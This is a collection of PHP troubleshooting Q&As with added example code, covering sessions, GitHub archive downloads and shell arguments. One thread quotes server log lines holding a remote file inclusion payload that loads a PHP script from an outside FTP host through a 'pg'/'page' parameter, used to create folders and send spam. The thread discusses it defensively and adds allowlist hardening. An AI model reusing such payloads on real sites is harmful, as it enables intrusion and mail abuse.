Session won't start and server variables are incorrect - php

I am trying to start session this way:
session.auto_start = 1
I set it this way. The session doesn't start. I changed start in my php as the following:
ini_set("session.use_only_cookies",true);
session_save_path(dirname(__file__)."/../User");
Basically, I don't see any file created in that folder.
Also when I do this:
$id=session_id();
I get $id=0;
Why do all those mistakes happen?

I am trying to start session this way:
session.auto_start()
Where and how do you do that? Not in code I hope? It's a php.ini setting, and if you want to enable it, you have to do it there.
I changed start in my php as the following:
ini_set("session.use_only_cookies",true);
session_save_path(dirname(__file__)."/../User");
Basically, I don't see any file created in that folder.
Does the user as which PHP runs have permissions on that folder? Haven't you got your PHP files sorted in deeper folders, where "(directory)../User" doesn't exist? Have you tried echoing the path to see where it points? Have you tried manually writing a file there? What about using realpath()?
Also when I do this:
$id=session_id();
I get id=0;
That's a symptom. Your session doesn't start, so you can't get a session ID.
$os=$_SERVER['SERVER_SOFTWARE'];
I am trying to get the operating system and I get nothing.
What do you get? Tried var_dump($os)?
and when I try to do this: $browser= $_SERVER['HTTP_USER_AGENT']; I get a weird browser.
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.121 Safari/535.2
That "Weird Browser" is Chrome 15. What's weird about that?
And please enable error reporting since I'm sure there'll be a few hints there.

User create folder in FTP from HTML

I'm facing a big problem and I can't find the cause. I have a website running in apache in port 80 with ftp access.
Some user is creating FTP folders with malicious commands. I analysed the apache log and found the following strange lines:
[08/Jul/2016:22:54:09 -0300] "POST /index.php?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&action=upload&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/ HTTP/1.1" 200 18391 "http://mywebsite/index.php?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
In my FTP the following folder was created: /public_html/Cliente
I have a piece in my code that uses $_GET['pg'], see:
$pg = isset($_GET['pg']) ? $_GET['pg'] : null;
$pg = htmlspecialchars($pg, ENT_QUOTES);
I tried testing the command "pg=ftp://zkeliai..." like the hacker did, but nothing happens, and I expected this. I'm very confused about how the hacker created a folder in my FTP.
Without knowing what $pg is being used for, it's not really possible to get what the hacker is doing, but it looks like he sent a POST request to index.php with the parameters
?pg=ftp://zkeliai:zkeliai#zkeliai.lt/Thumbr.php?x&chdir=/home/storage/9/ff/8d/mywebsite/public_html/Cliente/
The effect of your sanitation with htmlspecialchars is to convert the one & in the string to &amp;. But when the request is processed by index.php, it will be converted back to & in an internal string, as PHP will assume it was just URL encoded, so when index.php is sending its server-side request to Thumbr.php, the & is present and serves to send parameters to the FTP.
We had a similar issue on our university's site. We have over 2200 hits the last few days from this IP with two different .php pages: showcase.php and Thumbr.php
Here's a snippet from our log
POST /navigator/index.php page=ftp://zkeliai:zkeliai#zkeliai.lt/zkeliai/showcase.php? 80 - 177.125.20.3 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+WOW64;+Trident/4.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+Media+Center+PC+6.0;+.NET4.0C;+.NET4.0E) 200 0 0 11154
This page was used to send spam through our SMTP server. The page= GET parameter in the URL was being loaded by our PHP page with no filtering on the value. The showcase.php page (no longer on the FTP site) was a simple HTML form with a field for a subject, a field for HTML body contents, and a text area for email recipients.
Without being sure what was posted, it seems loading the ftp page (with the included credentials) into PHP with the $_GET[] managed to execute the content on that page? I'm unclear as to how that may work, but that seems to be what happened.
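The hardening a defender would want for the thread above, as an added example (not code from the question or either answer): it assumes index.php passes the raw "pg" value to include(), which the thread never shows, and it uses a constructed sample value and a hypothetical PAGES allowlist.

```php
<?php
// Added example, not code from the question or answers above. It assumes the
// site's index.php does something like include($pg) with the raw "pg" value;
// the thread never shows that line, so treat that as an assumption.

// What htmlspecialchars() does to a payload shaped like the logged one: the
// scheme, credentials, path and query survive, only "&" becomes "&amp;". The
// ftp:// stream wrapper and include() are not bothered by that at all.
$sample  = 'ftp://user:pass@example.invalid/Thumbr.php?x&chdir=/tmp/'; // constructed sample
$escaped = htmlspecialchars($sample, ENT_QUOTES);
assert(strpos($escaped, 'ftp://') === 0);   // still a remote URL after "sanitising"

// Hardened loader: the request parameter is only ever a key into a fixed
// allowlist; user input never becomes a path, a URL or a stream wrapper.
const PAGES = [
    'home'    => 'pages/home.php',
    'contact' => 'pages/contact.php',
    'cliente' => 'pages/cliente.php',
];

function resolvePage($pg): ?string
{
    if (!is_string($pg) || !preg_match('/\A[a-z0-9_-]{1,32}\z/', $pg)) {
        return null;               // rejects wrappers, slashes, "..", query strings
    }
    return PAGES[$pg] ?? null;     // unknown key -> null, never a raw path
}

$file = resolvePage($_GET['pg'] ?? null);
if ($file === null) {
    http_response_code(404);
    error_log('rejected pg=' . var_export($_GET['pg'] ?? null, true)
        . ' from ' . ($_SERVER['REMOTE_ADDR'] ?? '-'));   // keep the attempt in your own log
    exit;
}
require __DIR__ . '/' . $file;
// Belt and braces: allow_url_include=Off (the default) in php.ini stops include()
// from ever fetching ftp:// or http:// sources even if a bug slips through.
```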

How to download GitHub repository as zip archive using PHP api?

I am trying to download the GitHub repository as a zip using the PHP API. Can anyone help me to resolve this problem?
You can try
file_put_contents("master.zip",
file_get_contents("https://github.com/{group}/{project}/archive/master.zip")
);
But make sure allow_url_fopen is set in php.ini, then you can easily use file_get_contents()
You can combine these two puzzle pieces:
php download file: https://stackoverflow.com/a/3938551/2536029
github zips: https://github.com/$USER/$REPO/archive/$BRANCH.zip
e.g. https://github.com/bpowers/psm/archive/master.zip
First, build a URL using this format:
https://api.github.com/repos/:owner/:repo/:archive_format/:ref
Then, use curl to visit that URL, but don't forget to:
Activate follow location (CURLOPT_FOLLOWLOCATION), set to true.
Assign a user agent (CURLOPT_USERAGENT), for example 'Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20100101 Firefox/23.0'.
If the repository is private, use your username and password (or token) to authenticate, setting CURLOPT_USERPWD to $youruser.':'.$yourpassortoken.
You can use CURLOPT_FILE to directly download to a file, just set that option to a previously opened file pointer created with fopen($filename, 'w').
Sorry, no sample code, but instructions are clear enough. It works.
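The curl-based procedure from the last answer, written out as an added example (not code from any answer in the thread). It assumes the curl extension and, for private repositories, a token in a GITHUB_TOKEN environment variable, which it sends as a Bearer header instead of the CURLOPT_USERPWD the answer mentions so the secret never sits in the URL; the repository is the bpowers/psm one from the thread.

```php
<?php
// Added example for the curl approach outlined above; not code from the thread.
// Assumes the curl extension and, for private repos, GITHUB_TOKEN in the
// environment (sent as a Bearer header rather than via CURLOPT_USERPWD).
function downloadGithubArchive(string $owner, string $repo, string $ref, string $dest): void
{
    // Only plain names may enter the URL: no "/", "?", ".." or wrapper tricks.
    foreach ([$owner, $repo, $ref] as $part) {
        if (!preg_match('/\A[A-Za-z0-9._-]{1,100}\z/', $part) || strpos($part, '..') !== false) {
            throw new InvalidArgumentException("bad path component: $part");
        }
    }
    $url = "https://api.github.com/repos/$owner/$repo/zipball/$ref";

    $fp = fopen($dest, 'wb');
    if ($fp === false) {
        throw new RuntimeException("cannot open $dest for writing");
    }
    $headers = ['Accept: application/vnd.github+json'];
    $token   = getenv('GITHUB_TOKEN');
    if (is_string($token) && $token !== '') {
        $headers[] = 'Authorization: Bearer ' . $token;
    }
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_FOLLOWLOCATION => true,   // the API answers 302 to codeload.github.com
        CURLOPT_MAXREDIRS      => 5,
        CURLOPT_USERAGENT      => 'archive-fetch-example/1.0', // GitHub rejects requests without a UA
        CURLOPT_HTTPHEADER     => $headers,
        CURLOPT_FILE           => $fp,    // stream the body straight to disk
        CURLOPT_SSL_VERIFYPEER => true,   // never turn this off to "fix" a download
        CURLOPT_FAILONERROR    => true,   // 4xx/5xx surface as curl errors, not as a bogus zip
    ]);
    $ok  = curl_exec($ch);
    $err = curl_error($ch);
    curl_close($ch);
    fclose($fp);
    if ($ok === false) {
        unlink($dest);
        throw new RuntimeException("download failed: $err");
    }
    // A real archive starts with the zip magic "PK"; anything else is an error page.
    if (file_get_contents($dest, false, null, 0, 2) !== 'PK') {
        unlink($dest);
        throw new RuntimeException('response is not a zip archive');
    }
}

downloadGithubArchive('bpowers', 'psm', 'master', __DIR__ . '/psm-master.zip');
```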

$_SESSION variables not working

As a newcomer to PHP, I need to get $_SESSION variables working as part of a larger project. I am finding that I cannot transfer data between .php files using $_SESSION variables. I Googled for similar problems and found this solved problem: Same problem
I reduced my code to the exact same as the solution to the problem, but it still exists. I have
sesstest.php
<?php
session_start();
$_SESSION['test']="TEST SESSION TEXT";
header('location:sessreceive.php');
?>
sessreceive.php
<?php session_start();
echo $_SESSION['test'];
?>
I have cookies enabled and it is the same in Firefox and IE. The site I'm accessing is a Raspberry Pi on my home network. It is running Apache2 under a Linux version. The session part of my php.ini is
Could anyone please suggest what might be wrong, as I get no output in sessreceive.php?
Make sure that the session.save_path exists. Sometimes that is the problem.
You can try var_dump($_SESSION); to see what exactly it contains.
Also, try echo session_id(); in both cases to ensure you're picking up the same session in both cases.
Make sure Apache can write to the session.save_path (/var/lib/php5)

PHP resetting Session after some time

I know this problem has been presented here in SO and I've tried the solutions but it's still not fixed.
PHP is deleting the session after some time of inactivity (I assume 24 minutes, as it's the default and seems to fit the testing).
I have the following code set in all the pages:
ini_set('display_errors', 0);
$sessionCookieExpireTime = 2880000;
session_set_cookie_params($sessionCookieExpireTime);
ini_set('session.gc_maxlifetime', $sessionCookieExpireTime);
session_start();
echo ini_get('session.gc_maxlifetime'); //echos 2880000 as expected
But the session still gets reset after 24 minutes (or so) of inactivity.
phpinfo() returns the following output for session:
Any idea why this isn't working? (PHP 5.3.10)
Thanks
Although Marc B's answer shares some great insight, it wasn't working for me. I was pretty sure everything was fine with my script and I had nothing messing with the session in my code.
After an epic struggle I discovered that my problem was actually due to shared hosting environment. From the PHP doc:
“If different scripts … share the same place for storing the session data then the script with the minimum value will [determine the session timeout]”.
After this the problem was quite obvious. Some script (hosted on the same server) was using the default php.ini session.gc_maxlifetime and that was resetting my sessions.
The solution was to create a folder under the root of my hosting (make sure it's not web accessible), set the right permissions to it and then use session.save_path to tell php where to store my sessions. Something like:
ini_set("session.gc_maxlifetime","21600"); // 6 hours
ini_set("session.save_path", "/your_home/your_sessions/");
session_start();
This website provided great insight: php sessions on shared hosting
So if you come across this issue, make sure you follow Marc B's recommendations, and if that doesn't work, try this out.
Best wishes!!
Are you doing this code in EVERY script that uses sessions? ini_set changes apply ONLY to the script they're executed in, and ONLY for the execution lifetime of that particular script.
If you want to make it a permanent global change, you'll have to modify php.ini, or put some php_values directives into http.conf/.htaccess.
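An added example (not code from either session thread on this page) that turns the diagnostics from the first session answer (does the path exist, what does realpath() resolve it to, can the web server actually write a file there) and the private save_path plus gc_maxlifetime fix from the shared-hosting answer into one bootstrap function; the directory, the 6-hour lifetime and the cookie flags are assumptions, and the array form of session_set_cookie_params needs PHP 7.3 or later.

```php
<?php
// Added example, not code from either session thread. Combines the checks the
// first answer asks for with the private save_path + gc_maxlifetime fix from
// the shared-hosting answer. Directory and lifetime values are assumptions.
function startSessionIn(string $dir, int $lifetime = 21600): array
{
    $real = realpath($dir);                     // resolve "/../User"-style paths first
    if ($real === false || !is_dir($real)) {
        throw new RuntimeException("session dir does not exist: $dir");
    }
    $probe = @tempnam($real, 'probe');          // the "try writing a file there" test;
    if ($probe === false || dirname($probe) !== $real) {   // tempnam falls back to /tmp if it cannot
        throw new RuntimeException("web server cannot write to $real");
    }
    unlink($probe);
    $droot   = $_SERVER['DOCUMENT_ROOT'] ?? '';
    $docroot = $droot !== '' ? realpath($droot) : false;
    if ($docroot !== false && strpos($real, $docroot) === 0) {
        throw new RuntimeException("session dir is web accessible: $real");
    }

    // A private directory means no other site's gc_maxlifetime applies to it.
    ini_set('session.save_path', $real);
    ini_set('session.gc_maxlifetime', (string) $lifetime);
    ini_set('session.use_only_cookies', '1');
    ini_set('session.use_strict_mode', '1');    // ignore IDs this server never issued
    session_set_cookie_params([
        'lifetime' => $lifetime,
        'path'     => '/',
        'secure'   => !empty($_SERVER['HTTPS']),
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    if (!session_start()) {
        throw new RuntimeException('session_start() failed');
    }
    return [
        'id'          => session_id(),          // "" here means the session never started
        'save_path'   => session_save_path(),
        'gc_lifetime' => ini_get('session.gc_maxlifetime'),
    ];
}

// Call this on every page before any output, since ini_set() and cookies are per request.
$diag = startSessionIn(__DIR__ . '/../sessions');
$_SESSION['test'] = $_SESSION['test'] ?? 'TEST SESSION TEXT';
```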

passing multiple parameters from php to shell

I want to run an .exe (C++) file from a PHP script. I tried many different combinations of the exec command, but my program still returned -2 (argv<6) or an array (?), so now I tried to use shell_exec
<?php
$params = array ('nnn.jpg', 'fff.jp2', '300', '300', '50');
$params_string = implode(" ", $params);
shell_exec('demo.exe '.$params_string);
echo 'demo.exe '.$params_string;
?>
but it is not working either... I echoed the string I used, and it's just okay
demo.exe nnn.jpg fff.jp2 300 300 50
any ideas?
I got it to send parameters properly, but program exits with error caused by write problem. I've changed all perms in target folder to "full control". Maybe there is something with php settings? (xampp on win7 x64)
ERROR: Exception: demo.exe: no decode delegate for this image format `kush.jpg' # error/constitute.c/ReadImage/532-5
but as I said before, all goes well through cmd...
The problem was more of a server issue. dar7yl was almost correct: the problem was that Apache didn't have access to the ImageMagick lib, located in Program Files... I had to change the Apache user to my account, and now all works fine ;)
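The same demo.exe call written the way it should be run from a web process, as an added example (not the questioner's script): every argument goes through escapeshellarg(), and proc_open() captures stderr and the exit status, which shell_exec() throws away and which is where the "no decode delegate" message and the -2 return value were hiding. The file-name pattern is an assumption.

```php
<?php
// Added example, not the questioner's script. Quotes each argument with
// escapeshellarg() so a file name such as "x.jpg & del *.*" cannot become a
// second command, and uses proc_open() to see stderr and the exit code that
// shell_exec() (stdout only) never shows. The file-name pattern is an assumption.
function runConverter(string $exe, array $args, ?string $cwd = null): array
{
    $cmd = escapeshellarg($exe);
    foreach ($args as $a) {
        if (!is_string($a) && !is_int($a)) {
            throw new InvalidArgumentException('only scalar arguments are allowed');
        }
        $cmd .= ' ' . escapeshellarg((string) $a);   // double quotes on Windows, single on POSIX
    }
    $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($cmd, $spec, $pipes, $cwd);
    if (!is_resource($proc)) {
        throw new RuntimeException("cannot start $exe");
    }
    fclose($pipes[0]);                                // nothing to feed on stdin
    $stdout = stream_get_contents($pipes[1]); fclose($pipes[1]);
    $stderr = stream_get_contents($pipes[2]); fclose($pipes[2]);
    $code   = proc_close($proc);                      // the real exit status of demo.exe
    return ['command' => $cmd, 'exit' => $code, 'stdout' => $stdout, 'stderr' => $stderr];
}

// Only accept bare file names for the image arguments: no paths, no shell metacharacters.
$in  = 'nnn.jpg';
$out = 'fff.jp2';
foreach ([$in, $out] as $name) {
    if (!preg_match('/\A[\w-]+\.(jpg|jp2)\z/i', $name)) {
        throw new InvalidArgumentException("unexpected file name: $name");
    }
}
$r = runConverter('demo.exe', [$in, $out, 300, 300, 50], __DIR__);
if ($r['exit'] !== 0) {
    // This is where "no decode delegate for this image format" shows up, together
    // with the exit code, instead of a silent failure in the browser.
    error_log("demo.exe failed with {$r['exit']}: " . trim($r['stderr']));
}
```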
